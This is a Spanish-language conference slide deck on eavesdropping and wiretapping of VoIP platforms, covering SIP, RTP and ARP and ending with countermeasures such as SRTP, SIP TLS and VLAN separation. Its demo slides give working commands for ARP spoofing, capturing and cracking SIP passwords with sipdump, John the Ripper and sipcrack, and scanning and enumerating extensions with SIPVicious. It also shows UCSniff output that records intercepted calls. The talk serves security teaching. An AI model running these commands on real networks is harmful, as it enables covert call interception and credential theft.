DISCLAIMER

Todo el contenido de esta charla es resultado de investigacin con nes didcticos y educativos. El autor no se hace responsable por el uso del conocimiento contenido en la siguiente presentacin. La informacin contenida debe ser utilizada nicamente para nes ticos y con la debida autorizacin. Todo descubrimiento realizado, ha sido y ser usado de forma legal. La audiencia debe asumir todo lo que se exponga hoy, como falso y sin fundamento hasta que lo compruebe personalmente. Limahack no es el autor directo de ninguno de los descubrimientos expuestos, ni de las herramientas demostradas, ni los conoce. Todas las opiniones vertidas durante esta presentacin son exclusivas del expositor, Limahack no es responsable de ninguna de las opiniones vertidas.

Ing. Nils Alvarez Huamn

Chuponeando
Plataformas de Telefona IP

Eavesdropping

Wiretapping

Men

Plataformas de Telefona IP Vectores de ataque a plataformas VoIP Descubriendo dispositivos VoIP Analizando los Protocolos involucrados SIP | RTP | ARP Huecos de seguridad en las infraestructuras de VoIP Demostracin y Recomendaciones

Plataformas de Telefona IP

Mal diseo de la Plataforma de Telefona IP

Las compaas buscan mayores funcionalidades

Comunicaciones Unificadas

Beneficios de la VoIP
Reduccin de costos de cableado VoIP, Data, Video, sobre una misma infraestructura de RED

Reduccin de gastos en comunicaciones (LDN y LDI)

Independencia de los Operadores de telefona Funcionalidades avanzadas Fax PDF Buzn de Voz Sala de Conferencias Mensajera Instantnea

Y la Seguridad?

Vectores de Ataque a Plataformas VoIP

Huecos de seguridad en la arquitectura. Informacin Gathering, Footprinting and Enumeracin Recuperacin de informacin tcnica de los telfonos IP VLAN Hopping Wiretapping Spoofing Caller ID Atacking Authentication Denial of Service / Flooding

Protocolos Involucrados

Sealizacin

SIP

Media

RTP ARP

Resolucin de Direcciones

Analizando el Protocolo

SIP
Protocolo de Inicio de Sesin
Desarrollado por el IETF / RFC 3261 Estndar para iniciar, modificar y finalizar sesiones interactivas: voz, video, IM, Juegos en lnea Parecido a HTTP y SMTP

Componentes de SIP
User Agent (UA)
UAC: Genera peticiones SIP y recibe respuestas UAS: Genera respuesta a las peticiones SIP Ambos se encuentran en todos los agentes de usuario

Servidores SIP
Proxy Server:Retransmiten solicitudes Register Server: Acepta peticiones de registro Redirect Server: Genera respuestas de redireccin

User Agent Cliente (UAC)

User Agent Servidor (UAS)

Mensajes SIP

User Agent Cliente (UAC)

Las solicitudes (mtodos)

User Agent Servidor (UAS)

Las respuestas (cdigo de estado)

Mtodo SIP
REGISTER: Registrar al User Agent. INVITE: Permite invitar un usuario para participar en una sesin ACK: Confirma el establecimiento de una sesin. OPTION: Solicita informacin sobre las capacidades de un servidor. BYE: Indica la terminacin de una sesin. CANCEL: Cancela una peticin pendiente

Respuestas SIP

1xx - Mensajes provisionales. 2xx - Respuestas de xito. 3xx - Respuestas de redireccin. 4xx - Respuestas de fallo de mtodo. 5xx - Respuestas de fallos de servidor. 6xx - Respuestas de fallos globales.

180 200 302 401 503 603

Ring

Ok
Moved Temp No authenticate

Service Unavailable
Rechazado

SIP: Proceso de Registro

SIP: Proceso de Registro

SIP utiliza HTTP Digest como mecanismo de autenticacin - Sencillo - Eficiente - Inseguro

SIP: Establecer una sesin

Real Time Protocol (RTP)

Es el encargado de transportar audio y video en tiempo real Utiliza UDP como protocolo de transporte Hace uso de numero de secuencia, marcas de tiempo, envi de paquetes sin retransmisin RTP se integra con el protocolo SIP gracias al protocolo SDP

RTP no esta encriptado por default

Entonces podemos hacer wiretapping

ARP
Se utiliza para asociar una capa 3 (capa de red) direccin (tal como una direccin IP) con una capa 2 (capa de enlace de datos) direccin (direccin MAC). Para ello se enva un paquete (ARP request) a la direccin de difusin de la red (broadcast (MAC = FF FF FF FF FF FF)) que contiene la direccin IP por la que se pregunta, y se espera a que esa mquina (u otra) responda (ARP reply) con la direccin Ethernet que le corresponde

ARP

ARP

ARP

ARP Spoofing

Engaar a ambos dispositivos, hacindoles creer que somos el otro, y luego reenviando los paquetes

Antes de un MitM

Ataque MitM
#arpspoof -i eth0 -t 192.168.1.17 192.168.1.100 #arpspoof -i eth0 -t 192.168.1.100 192.168.1.17

Eavesdropping
El ataque mas temido e impactante

Con un previo ataque Man-In-The-Middle, el atacante consigue ver toda la informacin Sealizacin Flujo de Media Se compromete la privacidad del usuario Anlisis de trfico

Capturar y crackear contraseas SIP

1.- Usando SIPdump empezamos a capturar trafico SIP #cd /root/hack/SIPcrack-0.3pre/ #./sipdump -i eth0 capturaSIP.pcap 2.- Usamos John The Ripper para aplicar fuerza bruta para descifrar contraseas. #cd /root/hack/john-1.7.5/run/ # ./john --incremental=alpha --stdout=4 > /root/hack/SIPcrack-0.3pre/myfifosip 3.- SIP Crack # cd /root/apps/SIPcrack-0.3pre/ #./ sipcrack -w myfifosip capturaSIP.pcap

EAVESDROPPING

Tcnicas para realizar eavesdropping

VoIPHopper, Saltarnos la VLAN Voz ettercap, para hacer ataque arp poisoning wireshark, para sniffear la red y reconstruir la trama RTP

#arpspoof -i eth0 -t 192.168.1.100 192.168.1.17 #arpspoof -i eth0 -t 192.168.1.17 192.168.1.100

ARPSpoof + Wireshark = Eavesdropping

Scaneo | Enumeracin | crackeo de contraseas

SIPVicious
Conjunto de herramientas de seguridad en VoIP

Svmap (escaneador SIP) Svwar (enumerador de extensiones) Svcrack (crackeador de contraseas)

Uso: - svmap.py 192.168.0.0/24 - svwar.py -e1000-1999 192.168.0.100 - svcrack.py -u1001 -d dictionary.txt 192.168.0.100

EAVESDROPPING
Tcnicas para realizar eavesdropping

Voice VLAN Discovery and VLAN Hop support ARP Poisoning engine / MitM Automatically links VoIP signaling with RTP media Automatically re-constructs forward and reverse media into single file IP Video Sniffer support

DEMO

Y tiene que funcionar!!!

Algn Voluntario?

Voluntario 1

MitM Learning Mode

ucsniff -i eth0 // //
UCSniff 3.20 starting Listening on eth0... (Ethernet) eth0 -> 66:66:66:66:66:66 192.168.0.101 255.255.255.0

Randomizing 255 hosts for scanning... * |==================================================>| 100.00 %

5 hosts added to the hosts list... 5 hosts saved to arpsaver.txt ARP poisoning victims: GROUP 1 : ANY (all the hosts in the list) GROUP 2 : ANY (all the hosts in the list) mitm/ec_arp_poisoning.c:132 - arp_poisoning_start starting arp_poisoner thread Starting Unified sniffing... Warning: Please ensure that you hit 'q' when you are finished with this program. Warning: 'q' re-ARPs the victims. Failure to do so before program exit will result in a DoS.

Wiretapping

Mapped new target entry: (IP: 192.168.0.10) --> extension 1001 and name: Mapped new target entry: (IP: 192.168.0.19) --> extension 1002 and name: SIP Call in progress. (extension 1001, ip 192.168.0.10) calling (extension 1002, ip 192.168.0.19) 1001-Calling-1002-23-7-28-1-both.wav 1001-Calling-1002-23-7-28-1-forward.wav 1001-Calling-1002-23-7-28-1.pcap 1001-Calling-1002-23-7-28-1-reverse.wav arpsaver.txt calldetail.log call.log sipdump.pcap sip.log skinny.log mplayer targets.txt

1001-Calling-1002-23-7-28-1-both.wav

UCSniff GUI

Voice VLAN VLAN ID:50

RED
Data VLAN VLAN ID:80

VoIP Hopping

Acceso no autorizado a una VLAN dentro de una infraestructura de VoIP

Descubriendo dispositivos VoIP

Vlan discovery

Voice Vlan pueden ser fciles de descubrir

Solo tenemos que buscar las informacin del paquete CDP Utilizar herramientas de sniffer VoIPHooper Buscar informacin desde el telfono

VoIP Hopper

Es una herramienta para testear la seguridad de una infraestructura de VoIP

Cisco Discovery Protocol (CDP)

Es un protocolo utilizado para comunicar a los telfonos IP que VLAN ID necesitan para utilizar en el 802.1Q

Contramedidas

CONTRAMEDIDAS

ArpON Securitizar ARP para mitigar ataques de tipo Man In The Middle SIP TLS Cifrado de sealizacin, mecanismo fuerte de autenticaci{on SRTP Cifrado, autenticacin, Integridad VLANs Separar la Voz y los datos Restriccin de acceso Filtrado por MAC, Filtrado por puerto 802.x, QoS Desactiva el men de configuracin del telfono IP Desactivar el acceso web en los telfonos IP Sistema IDS/IDP

Nils Alvarez Huamn @nalvarhu http://nalvarhu.blogspot.com

GRACIAS!

Referencias

http://www.securitybydefault.com http://saghul.net/blog/ http://voiphopper.sourceforge.net/ http://ucsniff.sourceforge.net/ Todas las imgenes son propiedad de sus respectivos autores.